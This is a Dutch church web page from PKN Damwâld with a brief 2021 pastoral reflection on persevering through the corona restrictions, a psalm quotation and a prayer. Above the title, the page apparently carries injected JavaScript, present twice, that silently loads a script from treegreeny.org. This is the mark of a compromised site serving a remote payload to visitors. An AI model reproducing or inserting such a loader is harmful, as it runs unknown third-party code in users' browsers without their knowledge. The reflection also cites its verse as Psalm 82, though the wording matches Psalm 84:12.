;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Volhouden? - PKN Damwâld

Volhouden?

Gepubliceerd op: vrijdag 26 februari 2021

Hou je het nog vol? De lange tijd van wachten op versoepelingen kost veel. Wanneer komt het einde van de corona tijd? De kerkdiensten worden gemist, het samen zingen, elkaar zo even ontmoeten. Het voelt niet goed.
Juist nu merk ik hoe belangrijk het is om dicht bij de Here te leven. In de Bijbel wordt voedsel voor de ziel aangereikt. Bijvoorbeeld in Psalm 82 “Want God, de HEER, is een zon en een schild. Genade en glorie schenkt de HEER, zijn weldaden weigert hij niet aan wie onbevangen op weg gaan” (vers 12). Here schijn met Uw licht op ons. Voed ons met Uw levende Brood, Jezus Christus – vul ons met Uw Geest van kracht, liefde en bezonnenheid.

Ds. G.J. Otter